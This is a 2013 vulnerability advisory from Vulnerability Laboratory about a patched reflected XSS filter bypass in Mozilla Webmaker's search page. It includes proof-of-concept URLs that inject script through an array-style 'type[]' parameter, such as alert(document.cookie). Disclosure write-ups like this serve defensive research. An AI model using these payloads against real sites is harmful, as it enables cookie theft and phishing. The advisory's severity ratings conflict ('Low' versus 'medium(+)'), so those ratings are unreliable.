Mozilla WebMaker - Filter Bypass & Cross Site Vulnerability

Document Title:
===============
Mozilla WebMaker - Filter Bypass & Cross Site Vulnerability 


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=981

Mozilla Bug ID: 835445


Release Date:
=============
2013-07-09


Vulnerability Laboratory ID (VL-ID):
====================================
981


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Mozilla Webmaker is Mozilla`s educational initiative. Webmaker`s goal is to ``help millions of people move from 
using the web to making the web.`` As part of Mozilla’s non-profit mission, Webmaker aims ``to help the world increase 
their understanding of the web, take greater control of their online lives, and create a more web literate planet.

Welcome to Webmaker — a Mozilla project dedicated to helping you create something amazing on the web. Our tools, 
events and learning guides allow webmakers to not only create the content that makes the web great, but — perhaps more 
importantly — understand how the web works. With this knowledge, we can make a web without limits. That`s the philosophy 
behind webmaker.org. We`ve built everything so you can remix it.

(Copy of the Vendor Homepage: https://webmaker.org/)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an input filter bypass and a client side vulnerability in the official Mozilla Webmaker Web Application.


Vulnerability Disclosure Timeline:
==================================
2013-06-21:	Researcher Notification & Coordination (Ateeq Khan)
2013-06-21:	Vendor Notification (Mozilla Security Incident Team)
2013-06-25:	Vendor Response/Feedback (Mozilla Security Incident Team)
2013-06-28:	Vendor Fix/Patch (Mozilla Developer Team)
2013-07-10:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Mozilla
Product: WebMaker Application & Service 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A reflected XSS vulnerability has been discovered on the main web application of Mozilla Webmaker because it is possible 
to bypass the current security controls of the web application using a fairly rare technique. During the initial tests, it 
was noticed that in the search module of the webmaker website has two variables as mentioned below:

1) Type=
2) q=

Values of both variables are being reflected on the webpage in the search results normally and the usual malicious script code 
requests are also being filtered however, using the Javascript Dynamic Array function, it is possible to define the variable `type` 
multiple times and doing so, makes the application execute in an unexpected way and hence results in successful filter bypass. 
By adding [] infront of the `type` variable, all filters get bypassed and its possible to inject any malicious script code to execute 
client side XSS attacks. The researcher was able to use the same variable dynamically to execute multiple payloads at the same time. 
All step details are mentioned in the POC section of this advisory.

Exploitation of this vulnerability requires a non privileged user(attacker) and low user interaction(victim). Successful exploitation 
of the vulnerability results in user session cookies hijacking, Client Side URL Redirects, Phishing attacks and other similar client side 
attack vectors. This vulnerability affects all internet users including webmaker users, Thimble and Popcorn users. 

Vulnerable Service(s):
				[+] Mozilla Webmaker Website (www.webmaker.org)

Vulnerable Module(s):
				[+] Search

Vulnerable Parameter(s):
				[+] /search/type=[XSS|IVE]


Proof of Concept (PoC):
=======================
The refelected XSS vulnerability can be exploited by anyone browsing the internet and using Mozilla Firefox Browser. 
For demonstration or reproduce ...

PoC #1 (Single Payload)

1) https://webmaker.org/search?type[]=``><script>alert(document.cookie)</script>



PoC #2 (Dynamic Javascript Array, Multiple Payloads)

2) https://webmaker.org/search?type[0]=``><script>alert(137)</script>&type[1]=``><script>alert(137)</script>


Source Code Showing injected Iframes for POC:


 <div id=``midbar``>
<div class=``search-poster`` data-query=``webmaker:featured``>
  <div class=``ui-wrapper``>
    <div class=``giant-search-container``>
      <h1 class=``main-title``>What are you looking for?</h1>
      <form class=``search-wrapper`` action=```` method=``get``>
        <div id=``search-type`` class=``search-filter``>
          <input type=``hidden`` name=``type`` value=````><iframe src=``http://www.vulnerability-lab.com``></iframe>``>
          <span data-selected><span class=``icon-``><iframe src=``http://www.vulnerability-lab.com``></iframe>``></span></span>
          <span class=``icon-caret-down``></span>
          <div class=``filter-list ui-select-menu``>



Solution - Fix & Patch:
=======================
Users should not be allowed to define the same variable multiple times because it results in abnormal behaviour of the web application 
and hence is the root cause for filter bypass in this situation. Proper user input sanatization should be performed on the web app source 
code end in order to bypass all malicious script code requests.



Security Risk:
==============
The security risk of the input filter bypass and refelected cross site scripting web vulnerability is estimated as medium(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan ([email protected])


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory